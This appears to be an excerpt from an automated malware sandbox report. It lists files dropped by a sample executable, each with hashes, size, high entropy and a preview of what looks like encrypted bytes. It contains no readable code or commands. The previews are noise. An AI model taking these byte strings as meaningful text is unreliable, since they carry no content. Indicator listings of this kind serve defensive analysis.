              SSDEEP:48:iyIbKDQn/esC9Lf4cHHUo1TqbznQSJ12GTTqWcKLXBzLxvaHrBKlU51mA0AoCc5u:O/dw4iV1GQM12RKrBzLxc9KU5H0v4
              MD5:724B0B2C029FD685555ACBDDC5D342ED
              SHA1:590949B4C8ECB207D7673914BF7FB675C409949D
              SHA-256:86E32E35862E0703052ADFB76FF7B9028F050284CDDD49A5EF0F2B469884B333
              SHA-512:80C28EE16276D4D195193EA3E3067F551BBC012D4D81406078B0C3470902499FD5A8D79EAC2C7DC269FD393D579F1686E61787B999FCE42DFE1ADC8597EE0858
              Malicious:false
              Preview:{. " Z..#..aN...P.. 3...8L..Q.....&....*....=.C...:gX...(S.p.q.ZD........w..%.&.Y.E..Z.$N..../.N..=. h`..w.\...O+^......e..>......K.....<h3...N{.$.lM..../.....P.m.3<..6..6..;{.0....8....(......zQ...m....?..<:.L._...5...Sw.M_dN.....T...9...Y....#.X>s...>1Y.OE.s.Y.M.......0......|.&@0n.(.[.s./.`...&.k..*8./.....q3LB+.....CjCd..PZ.%...*.dt.......t!......`_.,... O.%............n.j..).BX....lnHq0.".GAZ.9.pp...>U5..@..Pw0Y.>....r....c..Z.d.{#.!L."4<4..i.IW...%..8...p|.q.... >A ......6.....7Q.+f..v.x).i.......ibY....k<.e...t..J.p2..v.....4.u...;....u".zsc.B...'........|.C..]9k..u..L8JcU..owz....XT...S.....Z.y..bC..!i./..y....].5..@.J5..P ..}.zbI_ ...)h.?.._....W.Q.....7|).T8.tm*.....lWF.........e...*x]..,Tv..5ZpP..S...0i.~....0.g.y............$@.!$.. .....FRVl$-.7.n...k.J.7M.^^...S..t{P..j.*.._.;E7......T1.B..6..*.....lz....4.,..s).......a.)..|-..l.......cI....#2.)RAP......e..6.v^....8.c...%E.1 .......t....g<........".F.4.S.|..
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):3050
              Entropy (8bit):7.942377186066755
              Encrypted:false
              SSDEEP:48:gmSx39bA2jNPeW3xJ+2vXDnl60Sr81QBj/PhC7nwZ+97WxRQsCIKrkfrdfT9RzKm:gF9bAUmW3xJ+aLs8W5/ZInwYAOsarMrD
              MD5:88860D09F7FC78A11494374F44380AC2
              SHA1:4D4A56B48EB4BCBE42F91B817F7E86965EDB79E5
              SHA-256:36C1F5F547A8FBD997DBE0B6144FCC81C4767BA0E1DBAE890D276BBE9C78D2A9
              SHA-512:394726ACEFDE9ACE6749244BCD205B49535FFF4AE624414CC8AA63B0C4B69C89B9878D9147CA2EE09D93251DBBA268A117FD169440755F1451142F09F6B8C40F
              Malicious:false
              Preview:{. "..Bw<..Vg.8+1\.I...L.a.....DBq1.I..bm.....Nu.p.0.....r....l.....]..J......(7]?.r....i..+......E.).K3.N..~=..{.......*)z..........:[.'7m..W.j....%U..9..s.N..U...NR.e..>X&...b.....G.Wj!<.........r|DL.....&..W5..#O...i^...,....Q^...G....;.>.*..)vF.;yr.....3#u{:....w^/....-.j.%.'..e..2").w...(....^.;[.}...l.....<'}..|.2[D.*x&.H>...S&.[O...".|.l.0.u...,..f......K.....Tr.E..L0.`X.....^4.-..=..8..iWYk....{.....8=.....?.]`...D.a......M....F...5o/8YH..Q..TC. ....>..T.W....?!....t..^=.%7...t..A.......Vn"_C....fy...Z...._...T._.p,.p......3........8.Q......Z...1.$(....ct.........?..$...i.5@..c).J.......X.3....*./..Bd....rt#.^..*k..~l.0u".........$..&..s+ru......,.......7.v..SLI=.....$../..{.\..r...Ajj.[%....P.......n...o/J..9.+,].ixu .q...&a...v.....4...{~}.!.g...j{....!..|....e.V.@.xa..=en.x.-.....*.....:'{m^..K}..*+..(..m.o...../...[_k@..."...w.`2H..0........<\.#...e..c...f..[.$'.7..y..NK.&.-*......4.....Qi9.....C..F...Kt....6.l...DPs...$...
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):3195
              Entropy (8bit):7.9439280634951945
              Encrypted:false
              SSDEEP:96:boN5QvBPxWZCR950aorBmuD31WYjTqsvl:+UBou0aoFmuDlWYjDvl
              MD5:E82052177C70719016631B98BB916695
              SHA1:CD722E7755D1F604060BA2A1CAB5F6DCE9C8065D
              SHA-256:B04621C9D76BF889C1B33C7668EB63555822202A8D5DBA5327F176356FB0B80A
              SHA-512:8339176CC33A4231E879DC5C8CD8A3DB1580644E50F227DCBDD3FB857CA11577FEA0BC2B9136702724BE369FEE0BEE96C87221AE2BEBDF8E13935A1C2A5C40C5
              Malicious:false
              Preview:{. "....r.p.$uCa_.12.+Q(.zK....la.=...2....>.....j.<..M.G...@.....h.ReK.`..(..j.-..h]Ve.....!6.....0a.*.-B.8+.../......?.....N m8....Ct...4...e...].bV2%...f.....u.%.b.6....^B.j9....S;B.....<l..v.t!.Q...=...E....@.x...b..:.q..q.....b..H9@(....-...Z,-5.3.!..G...[....5.._l|w.I..%.7.f02..t.....g.G......P...Y...5.,.kQ..4[EP5...>..i8&....U...&..X..}E...ClVn.N.....L@..<4.iW".[.J:i.<W......&v........:....p.K.....ACY.f..,.M.5..Eq...........X.u.mO.X...m.m.....a....n........,..2A.C.I=k1:....'..0..`d....)..|d.!.w(.....y.9...^..S\....Ar.R|..f......5...:..b._(4X....".pf..C...,.+..B...7t.S....rN.#.f...Y)..4...|.o.X..!..dM.3...C."I.|..V.....D#...U...M...`a..p.m....M.Nn.5...U....C."q.W\{Eb.4..+.#.q..=<=.N.n..B......N[.......=..?.....5...V.......9.X...M.Np.3...~5...........$..x.p4g......%...]......-P..~.h..Ti...o.u..|....@.*.....!d..c!.2).o..?...M..8M.VQ...w..;.......].:./..<..S.".8.`..7.7.};..K..A.S..o..W./..t....*.....k.C.......k.W..K.L_.*6....
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):3391
              Entropy (8bit):7.938673946560748
              Encrypted:false
              SSDEEP:48:xmgW/YIOIDRp9b+qi8i2mww0nw9eOTwOAzIkrBMajbrizJHHRNI8D:UgdINTCqi80lxT1OIktDoRz
              MD5:7E57558206F09743B1F6213DFFB1E308
              SHA1:2E4CD0BE4740D0744A6EA16D99460F410148C68D
              SHA-256:2BCE56274412842D9E132D4B98BD55F820E5E41931993ECD6A9C6FD9CBA4084B
              SHA-512:6D0900C0927E01CC832F9E0DC463DAF197993D317906FB4BD373BED2D69C23A72510A80FDE580D59CB52E9FCCA376FE79D4DDE630786F35C38240CE448CCD851
              Malicious:false
              Preview:{. "%Y.#.j...{.{....m...W}......:....<.,..'....X.z..0_.qL..P:8...j.1....2Yd..(.y[[.u.#.LG...*L.".......7...v..ERR.B_rt....^.......7.^.sF..h...-'..7..E..A4.V.,....W.T.E.h.......3..f[..80..^..."......o..._.p.pR..T".....aD.W...}Ro,.[.t.D..bPe...ZW....;?:.*.j.......-..:..3...?!3.{.N{A...7.....~..._....~..g..$gl...j..cYq...q.M....v.5.b.S.N......B..........o:.X.CN...D.!...?.v.I)c.y1`.4l>.-..tI...u>......U........).,.,&9/....t.;..S.<?.-..3"lJxm.m...X._.'O....Gek.....X.bq.@.a ..U.&-...2..z>g.G&y&...h..po...J....[g...F.w:}....cC...FM.q[=..../m?....9Of....D..d.`......Xq...._C.r)o...........>...g.#l&i.k...M.........( ..Hwy..V....K}..d_].V..j.O.+.F..W..h+R..U.uTd.....p.p.......l...%.....?.....q.|....|!i...w..R$[>.3.a.eh....N.x...$....3.......X;.G.......;(.xRO.....O.MP.....$TG.+.F:.!..?i~....-/...w...4+.....>1.=.....tRu....'......Z..Yp..a]9/.pz.......G.....Mt..<...#.:..Ww:..C....O.P .-....2#....>.z.uJ..U.d..7..{.(]kv..............+..!WC..
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):3391
              Entropy (8bit):7.936765818622124
              Encrypted:false
              SSDEEP:96:yjAxQ7Zl6WdBZqSMAgqKqO1SEAZV6+5eUgZ:UVH6ueSMAJp6SZ8FZ
              MD5:A960B86D8C04C53C0DAB1BFA1E395771
              SHA1:7AE84614548D25E008D56C9C3899BF8A75C7C786
              SHA-256:1B09F9CD9881E220D563E67814E004DF7218C7E1992F2DC29B60B48AE803C1EA
              SHA-512:082D6F06B538D39E45E80274D5038166FED84940759A77BE0A49E20F7096D2FFEE3F433EDE7382B541B3689E5A8A98DEC203DDA2F47D71F05B80A0CEB0AE17D4
              Malicious:false
              Preview:{. ".sV.,..BU.[.?}+.......m..^>......)A...E..ln..0+\.)..;....}.0.di$T.`*....M...[..O.~..bd..H..l.F..F.......y.'4p*.g.U8...y.....V._j...y.V...i.[H....M..,...D..1...U.w.H.i....f..U.^.y..'.^~X.....{.`..../iF.T.....L.+?.*z.q.YxI.>...3=..F.$&."..:..Yn.CV.v.3/9.....^t(f.5..M......Y.k.t[....\...hh0.......H.5,...<....9...?.C#..A.G.......y..u.l].'.6..r..<....Jy....M1.fr3.^.....FW.wx......}#..........xk.#.........a.7...m.!k........t.b8...U.....d......\.B...k..}.S...]......G.i.h...w(.c.,^.9SR..|i....}.|>..'........J6..v..........r....e.q.e.....r.bm..... Yh.Y#a.,..Z..c.....s3A...#.}.7..Jn^...l1I.|5*..py5..7.*....?..(Q.qs....~..C..;..t.D6s.......D..u....4.......Fek......H..._]......=OY].V.xx.E..-..... `.Je... .o6...r..g...b.....5XD.3........v.).En...:r.Y..{..S..z".&..4.'.....z=b..t.....Y.1.9...4.5$..ap.._9w...n.$}x...V`..wER]O.......u...m..{9w.t..q...?.8.Cd..e...H....Q.....+N.'..f..Ea:f..9y>..c.5....._.....d%.....:..Rm...2l.q%...:..X..K.o.....b..
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):3226
              Entropy (8bit):7.926134603492495
              Encrypted:false
              SSDEEP:48:4DmeL8uezYYph0K/zjowb2AMfiJMP4N31rG5U48ee1Lp6AH91JbAU8D:fQCYYIUoHJf4s4NVG5+v6ujtk
              MD5:33DFFFD75C76EF78DF584FFBDE0197B8
              SHA1:997570112AFA0CC1A3D94F5783D896A45938A4D2
              SHA-256:E3C2A05C669769FA6F24D3E49D5C4EEFB2CEFF39B4CA71AC39F5396EB2483146
              SHA-512:75BF4EE1AFD2CB781D0037D513B9BC348BC8E1081517458AE3483F7C7F4256C99EF593AB50998F6C6F208712760D832C0477AF9D3CF151958B9F9A68418590B5
              Malicious:false
              Preview:{. ".Y..6.%O..E..^./f<!.$<uR.IA$.....a.=.e.;.L?....4xl...G.....GV+y...,.......6UGRw.\.0.\...|....1c.G...xO.Q.6e..'#:s...,...,.....\}...Ir....-.9.E.r<.'..A...s....;+.d.N......d.@.c.Y~..e.wD...`........6j..S.N.,u$...M..1..G.x.....q2A.hf"...k.4.....5..2b.;^...^:...{O.T._B.F..B+....`.T.C..f......oz.v.}.f.<...Z..ueu.X....3.N.........iJ5...b...k...cv!-c........z.m.7..t....!.../79..v.......?."^1..b.jK..1}.g...C,.]k..-...N'..)......).....:......T5Z4.2vr....W.8.zac1.~......6.....p.;.8E.......k..e.......#nU.v....|.a.0Z..e.c...HR.9..c...@..1...&](z....?8..+x...Zj.X.(.....2..M.Z..p.m...0T.Smb7 {wuy..~...8^.q.... .._...f...C#/..-...d`B............{.G(......V..c..W....J......R.HYPd.^r)...M....... .e.rn.TZw2I7.~...<.Z,[.1yz.o*W..e.g.C!..o.G|vd......u0.Gnf..9.+. L:^Fd....g:~.I.Z.6....U[.2...i.E../.....v....M.g..,...+l.......C...6...5)c...E..l......+].t...N ....4!.U..)....'N k.%..C|.6.ef.oe*./k....b.G.J.~}...~...7.&.b.Yj{.#m.....(E\..T^...............b
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):3214
              Entropy (8bit):7.949863642217762
              Encrypted:false
              SSDEEP:48:CYVjd2JKYosMMwvh4xBXZ6o2mycS66ZTLXdStqwoL1EhZrOnsXOMmrCEustru8D:NjsnoSBpI7z4qwoLeMMmDuQX
              MD5:09621F6AEBB7DAC4F1B458EEE36AF012
              SHA1:2E457EB05277A2650B045E95735D19AD0CF7EA67
              SHA-256:F94481F6BB7B2672FF8BB0037AF5F813F60B8C6E1F691D1A8544229980DF50A3
              SHA-512:68CE4A6EE274520F64A0738EE6C846670C520A505B21272495FCB41998E6E8723EBD15CD2523CC6DAA8BF43C7161ECDFB2D38A9085A66E5FAB6C0238E7486AB3
              Malicious:false
              Preview:{. "4..DOu..!.i.........F.T^<.....0.-...l.$.{R..hrW.;.~'i.n..j....@~.W...]..:.L.%...r..T..^*1}...xz.....AO6.8...^.6Es...a..........YN..(h...s...i.D.Kr..D.....t._.b. o.. ....M.....3..*....a.........9.m...S.\..C\..m.U..s.M..IW....2.n.a....N.].M.+U....E.>....4.j...&.~[./..id...Wo.,..`...#.g..(k....#-.j6p.....t.g...q[..)M<h...T.1e.K.".?............?...B..s...>...)...Z_..?j..Y.L..w|^?.....e9.GI.~.`...L.<g"....(."c..dI..q..=..{.42A...[B..,....Z.H/..x.7(...t.C'.....g.....E`i.j...H..._.....{.-?..p..*o..D....o.^..ju.5....d./r*.|..:...-.."._/$H..B..zu.......xZ...;..:.....&..4....R.............W..kP-...C.h>..2.mz............~.....(.........b.a%.L.....3...?.,|..eb...H......9z..."0.5.0...t.,......gC............X`.. ..2.9.qq..d....:.....4....Km/.W.kr...7....,y.7`.......".X3-C..@.*_.>k=.i.M.....*.g..H...@V.X.%.A.s..-.y..Y.K..JIYF.@.U.zP..\.{..1A..^....C'.c.+.K.}..F.nrT"J....#f.E....1!&:#._.C.|C...\K..~S....XQp.`v.{%x..E.d...&.T6.......!R_,..
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):3615
              Entropy (8bit):7.945032471847059
              Encrypted:false
              SSDEEP:48:VeZExzu7GjoRfhTm2AQadoa2nUeer5sSn5nW0g4Jubd1vudw9tdh1cdjHc48D:VeONtoRfByQwqUnTgoubnmWLjudjHcV
              MD5:39CB4C424CAC22AFB929B52CA78BF27F
              SHA1:A632C6C204E59AEDCE9B889B506C7C30CE7C074B
              SHA-256:C2BA0806C59A6CF9F6763AE1D4F0B2E8AC78A5114309547AB22E55206E7EF5B1
              SHA-512:924FF9F6240E253649628C4EBC3E2268815871CBDC202F515961EB8DA3DD2D88274066253D69CE55C4262F590EAD2CBC30F7B6FDB503CA15AAA3192405BB357A
              Malicious:false
              Preview:{. "J.:..3.K....#. ....(.gU.8.u`....,....Z#......5p..h;....!ls.0/.l.xV.z,Pr7.-.`c.7(p.<..9....(....h..N.vL.=....<^!..|....W.e...,...,^..q......kc.7A.7.....m...iu$..E...o.Z^.).j.L.&.N.sa..#../.!...[..P7{.h.XF..."...V.V..g..J:?..]b..%v.^R'\.1...M2.._.wh.......h...W......X.G?.r.........c..bSrz..'a...F....._.E.&......1..\.z..R..rDyF&.2y..I%g...cQ3..LK....9.^oZ77...U.W. .]..l....1..9h\.E...|.[(.".-...%JD...=..B.gg.'K..E.F.B.k.9bX..H2#.......M..G..F..7^..m..e_=.Uy$.r....3%.YF..X...!..P...:...T.....Y.n..Q.4#.0nvR..[-Sg.k1...D.f.|....l..M...R..e,.[..l..k..!..Q...phr.*.j..PUT<Et.x.>.....#.`...\...<G.#.|...}....0....J4.$O^+.K.`<.'5;.X.D.m............,.+N%tL.......K=..d..._..j.....*.....y.#....'..WV..3.....7....l.....k....Ey..t.......".3......$_5#]..*8a.~.7f..v..E.J.. <........."....].a..eP....).=J..`...JVP..HQ..j.b..{.KSRc./.P+IM....W.P.g...../L.4...~...J5m.....;....}....%!...<.. ...wX.w..Q... .,....x..|..v.W.<.;K...W...(..Y=..4..M.~...g.
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):3243
              Entropy (8bit):7.93309729211198
              Encrypted:false
              SSDEEP:48:ujTuUlsDo4Suw93Ip5rRKXBtF5gs/TmtkFUnCztAJNYYy0rYpyfyohjVf4qVvYo4:Ej2MeOY3MvHgsZUydYNr8yfXVVxYl
              MD5:52BFBAAF048E2355BD59DE419917D918
              SHA1:1CAFFBD05B70377895720A16EA3B435DC968A0E7
              SHA-256:142F92C62DABD97D20836BE5EF980248E871AF244642382C5A10B67D9A4FB116
              SHA-512:ED8B728671B4FB92506A398238963D19D5EA6C6854701F2CB197E97B943A628737020B29C970E99BE3F1A559579E11E200AAA5F764A029409D8FF1357062B56C
              Malicious:false
              Preview:{. "..f5...37.<s.$....D*I.......Zpn.._..21X..R.....J.Ts;..o.]...i.5b\..L.6l.....-.!Y..e..ic..o.."...N.r......%6V}Sco.j..sc...:4=..D$|..P.3_..ui.6...Z...>...T?.cx^....yX..X..!5.j.g."Q}.k..Q...C?;.... ...Pc...^..(.n)b........;.9.v.j.2..SB.v<)39O.!...D.X..`......3.{!i....8..N.'`..hM;n....B.......5@Q.*..u0.y..--....G$...M|.05.~Z\J.,G.C@g..0.*zv..W{p...f.p...Q^...U.m...7...^....B..9.Z..|.k.3s.rn..^..<5.j..8...b.5...I\.=g.s..q....I.. .p...q...c.K.|op....9.U.P...-...MoK..@..8...$Q.e.;/D.K.GFQ.g{........3...u...<Y9...B.Rv.m.1.t^.B. ..M.D='.7H:.z._...E..c.:.$U....:c.).~s.b....S,.Ou.{.<..d....E.UtE.....'Uk2.t....g.Z....W...... n.&Z4a.U]...g.}..:V...*. f....qI.;R..@.;...:UD....?.|._.N.l.........4.8..U....\4..`-..6(1........nw-..U.Hn4:.~..7......r............'......8.z$_v.Sv.tsH.>.;.S...9J....w3.ZO....@...[..<....Z....Y.s./......N.R.........Hw.&...2`..v..h4G'.."ye/..Pv..<.2.U[.a.3.....}+...;.N...7..Tz...s......Ni..../-]......*....$4...J.....a._...b.
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):3190
              Entropy (8bit):7.941544398638357
              Encrypted:false
              SSDEEP:96:A8Y4bj6sQzI+51oKFkpPNRnTSo39087U2d4imx:V+sQzI+51ovPNFTn39qD3x
              MD5:BA881FA78E1268265701EB8EAAD3DD8F
              SHA1:B07686C04CAAB8DE9AD2DED68C05CB5E4B15D55D
              SHA-256:AC32B2D8E1B12C38C8FAE0080F26B3E583DAA8E36A21C5F391E4083425426205
              SHA-512:BFF1324940E1644AEF53B6699FE0A31CC68D73E529EB39A2B81EEFA71E985A89040F0DC66B4D323F7EFCC624BFA6ECC8AEC6709E5EDB713E829E4527B5E6317A
              Malicious:false
              Preview:{. "8.4..<L\<....v)q.p....}.s.-.b.:..1.F.R]tF...3.....q.../``|..Z..NBC.gwVG..h&\.-X..%.d.p........;.;.....J.{.x.&........2$V7].....s.\..\..a._.....1..@Z.U.Ct1%....^....=8].oB..y.}...|]i.n..cx..>8RO.m.&F.E$..Z.g....<2U..p.C...A.....*..?4.(.>&....Ahn..K.g.fg.X....!.%f..9....4RT.HH~..r} 6....5v.5m<X.~..$u.vvh...Y9$%]......w....I..^..v...j-..K..5.l...it...DR..f.FZ..#P.........0...EGF0... .m.5......:U..n....*.$.8.+.B...K..WeC...MS.g.pj.~.dSB.m.s....Cd.7.s..a1.*...8!..H..~o+.sb.....fU....`..C...`...N..y..}Gx.t9X..c.e......O#.. ...^..`.....#.rg.<l)..HL.....t....y:..=?a)F......|"..V.*.?1.?I*.i0).<.O...7...d..B.(.n......B...H8D....mxj.t..*.S..<...@.....6.91j|>.#.....dT..(E./.(.m..^..."C@...:...{.j..`....-....Q.el-F...N.I......'._ ...F.Y.x.yCdf.8J......B....+(....x....M..x..br..1Y.>.......yE.9/...J.GLN.q..%.m{M.;..../q.H......ETg...\...e...z.#t.d e.>..T.5.~.Db..3..'...s...........'....J.......8if..0..>s.x... TU.NZ.#.....]....]...d.M./...7D.q....V.....A...5V
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):3300
              Entropy (8bit):7.943740599944346
              Encrypted:false
              SSDEEP:96:kDr7k7SVfqj8bzLCHGFavieTvpIC9lhRs:SoW5qeCHGFat759G
              MD5:9EB2CA2B689799F58A7D860BA31B2EAE
              SHA1:92FD0005F1E3688ECFA9BAC26E064EA1EBCCE404
              SHA-256:7630997E822204D456F4B2DE7BE24B50AFB723055D56AA0D1DDABA940C9EF0ED
              SHA-512:0F41D99898E10D1E79DB8B23EC434BEF4EEEC367999F9A3DDFC496A0F38C3B614BFF79DBE9F22EB7A90B50722A0127E68497C129C0564B7993B99C440DC6F0B1
              Malicious:false
              Preview:{. "(..d...7.......o.r..P..q......\v ....-.B.z.W.{2a...iV...AH.......F.c..~....C.O..w_...2..........RS..>0^p......`..W.....sG........*-<...t:O.....rZ.yZ.H.vv[..L...c...y?...@8R..q..r.yt..v-...R.....e.jv.../...^,.A."cUH..0........;...@........l.}).....3..B.3O.I..O.l.x..s+wq.R..+2.+...<.Qq<@..>8.-....ze&.m..6.`.>4fd....B@...._..U|...".rJ...{o.8..95.x...u#.....JZ4.;}......h...ON.......qqxc.|~...._o.@.5._.,Z{.......1p..qU..L.8...r8.(...j+].....c4.P0..=Q..NT+.L..?h.....B|`.?..!O..X...w......[.K....^...Jl.FJ.4x...w..cf..Y....+..;Fj...T.4.7....F..H.......b..O..Ty...?fE)..U...A...)\...n........=...C..~.h\.....A+.A..]L..[kq3_.^n*.D.... ..1Tk9.k..H G1...X...F........O....].f.".1...Yh..k..\|........<.X.....GF:V....%........i....;...J0..FJ...O..y.~..z0.V.;......t.I.....#;....H..-m..N._+..v.dG.....@5...-......x..]...'....D..j..a..-.a..A.r..{..-.....",....U.x\7..L*.../.....*.RD)H.#`..|...2.....P..t......^.>8...ac........W,t..\./...g.rul...6..N.
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):4040
              Entropy (8bit):7.948080300243282
              Encrypted:false
              SSDEEP:96:NnSDY0VX+z2yLIOfg96zHObD+fLqks6HnjHlFWGYq:+jVuz2yZY96zuP+j4mnjFFWnq
              MD5:0ED34BBA65EC21A799915840255C80A1
              SHA1:09E7523B39FF25B71AD0DD8491A5A75234E38D3D
              SHA-256:AAB3BE01E248CB8D33C2E25F7347EF115CBFE1F7966AB80D10C646CA0F985961
              SHA-512:364C28573A5458BF7F740FED6B13C49ABE91C76FBFA6E33A98D757E31878A084A9DFF3DFA7A9AB519A029C7757D79BBC784E665CFD047ED2DC7E388F213EE391
              Malicious:false
              Preview:{. "..D.z..p9.=..h\..g....N.sA.C......soF$?..k...a...#'.dQC..{s......x...#..y.....~.Ff.x-y...`...-.K..B...h..l.`..l..u/........T.....QO..6.1|[.2...........j....j..9v.<C..Ap ....d......<y.@~....x...#..........3{F;r...-...T.f.>&3.;.`^.....0........9T_....2.1...<[.`..+.YB..#1..,5...K+.Z...Z..l.......c....bc...Fq...6.A4+C.F.......X!.q8....$....D....N'...Cz..........G.ucV.7.....O.5p...K........X...)k...`.....w~4...Ef...."....\*..{..,NI.`0..!:d...5@8.5....Y.y.y>:.,..%..Jr....8..L'.g.j..r..3.%...)....I....Y...w.....*.*.6.7....9..+...e..j..G...Q..]...0.OqA.w...H.......%D.rs..QD.....@......*...{.C\og.s...C.;...bc...u..q^..'.HsD..C....6N.nV$....d./..v...o...4.g...l....('...;u.."w:_5=..W..1tX4.....K....g..#.m.....o..E.^..G"F...!...n?.6.iT44.@1:t.tS8.a....J.b.e.o35TYm#..x....@...Ijd,..zPw.....F..u|.6.;.p..y.....$.Z$..w.KT.S.:."...A.k..6..F.r..v*|.@......T.N^D.5L.z....T..M....H.><+.....;.._].....C....:.c\.w.b.7M.p.!....T...g..*(*6.G..MC.b4?jlc.....a..JG
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):3179
              Entropy (8bit):7.938706038453668
              Encrypted:false
              SSDEEP:96:Nvu0EfXt829qsBUnwsf5+pBugLUp8gg1ZsNSA:NvwfXF9q8Unwsf5CB5LUp8xE
              MD5:2EEA78ADCC86DFA6F1B9F57EBCE73486
              SHA1:B9BE053148F5D22956DA8158D7C0C3E397F8C78B
              SHA-256:4D3A0CF38DCF852831DEC1A78966231932EF49DEC063CE3C70220BA0C01D4530
              SHA-512:D437DF3C76BC132A492C663A6293644CA93F62E68D124CB64DA8518559ED002EA74FE5F9FBEA8139F023A141B6BE47EE718304D1FD4CD40D013850CC2184BE4D
              Malicious:false
              Preview:{. ".=....}..O$..n.U.9R)...............sZ...ip.M.d..}.Ub.1y.)Gj9y.r^!#..Y{'...CO8.h...G..t@...p.K].M.VVB.K..}..+@E.......IM.z.Q^.Ot.t...c.M..TGF.0..X.O.;&.$.i!.-.1sZ.%......i0.....r.7.9.].X..y_..#..%;i..K.r..!.6).Cn...&.B..t.s.5lnPH=.......E....-....".....<A.........uK.........Eg+{....9./..e.N..r..t...>cW~J.s~...S~U}.CS.. .C.MZ..;....ep@.U..jM..G.LG...N....F...j.....Y.\..%.k&tI.......F.)Zqw1..Ub..[..U$.u.....3/..l....".G.g..E.<.d...4.....D..D...Mb.,wj.#d4$.5.Sj.`.).M...l.J.......pC...W^b..\E.EC.........8...d...i..G.j......ob...m+T._.s..`b.Pg.......Ox.......N.C....2.s..f.R,....eY...N..I/.>..|....%.'...._.FU....\j.uu.iN.o.S.O...7...f.U..x".G....l..6.L....p..f...'..N...(.s..Z.j..6..=GWR.+.|....[s..1....nE.n.....6;H..O..s.=(.+h .....1.6.=.m.=.(.4....p=..1.F..u....Z.@"{...%.;.....Ee...n.z..@.....,.Gt...&.*$.X........l.v..kh..T'.i....G......k.9.(/.S. .G.8l..K'X-.MS......A'.U..43.5..Wq-.?.5.P..K.H........h}:..U.zq=...V...Y.;.wae.........&2.
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):3047
              Entropy (8bit):7.940083888432213
              Encrypted:false
              SSDEEP:48:XIrkL2QTDJ+y1o+0MH6mRDqHsl8w3wise+/YOt2oat3qV39M3Xjg6BnTASvcOfgd:X9LNTULOqHs/we+AOwol39M3Xjg6BnM5
              MD5:3BA0BBE7465BA9822721782AD4CD02F2
              SHA1:CFE146E93436DFEA9C9223CC5635CB480D497056
              SHA-256:29EBCA5705DA2350C4AD7E42BFB876BC620BD9D6ECDFDC230C442B7EAF983A07
              SHA-512:B3DE47B6F8C2E8DF4CC2F368F6FBDA969183AD1E584C335DD83CD4C72B8D30D97023C0442AE76CA979EF7F854331813A87080766694D96C2FF47788F7CA21346
              Malicious:false
              Preview:{. "4hn...~$.>e.!..i.%6.|..X..f....=$./.....U...S`7.......5p..).Oo.U.....I...)..P....\.)y....O.:.X+...p.#..i~s..t)<R.D0.Dl.7p.-z..A.zP......J.....P-...|.e.W7....x.K...4.:.......o.....Dy...w...85..D...W.9...'.Y..m..*Vi>7...j..ax.f.H....|....w.T;.+a=..e.....=b{...L..#..(7..O.....ct:c|.Gn.`..W.&..../qY..Y..E..M...&.:..Be]U.0..S....\...J..=...Y.rv....|....F.2.....q..A...%.a.k\E.\..(%h..}..RE....Z..{...4.p.i..d(4...g...\A.0..I...7......Y....~..n.vU...f.85..%|/...--....U..yI.......tlU..e.......lS.i.y._..l..c).Q....d.z.#W...m..D.XC.0...P.....N.<.{.^..eq...P~.pn....k^%3L..;t.,R..E_B#E...NJ.....-...Ya.<.q.m..?.U.)...`..E..K........{M!1.......l(K.....W;.....0.g$.......~U..S..7.......d%..A.....b...B...QG...3Q..A/^.`./c..J.....A...'..FZ$v6".Q...g.^.......R$IM|/...#...%...............h....m..._.whI.[*...;T..'.rMt.&S..\(j5.....P4P.Zr5Q9Z......N..=...."..e.f.h...p{.....L..LC.T....!.W.._].........6.yV{a.5..G..[.y..P...@........l=v.&...Mh.Q..
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):3045
              Entropy (8bit):7.932089813254873
              Encrypted:false
              SSDEEP:48:ebTzpxtqPhAud+hIVhT+h7/y0UJnvIe1UcBw5yHeIbWCG7cUEmObjTRGbhO9jIFK:ebpxJudsIVhT+hB+vBj7nb1SE5bPcWj7
              MD5:577B102A6BDADDFA038318677283373B
              SHA1:3192E5CBC3D50F998F19B65ACB09386A4EEEFE7E
              SHA-256:3DD9385F32449CFB638C56125E7F1D3F674E8094D98D50636BB2E275FCE46F85
              SHA-512:5F8ED3FB19185845AC9ED01590AD9FCDDBC8EBE89544FA0455D349FBF325A0A08FE938CA7089F145F1E94A3B1BF34ACDBD8872C7DBEBFBB2BC8F579688329594
              Malicious:false
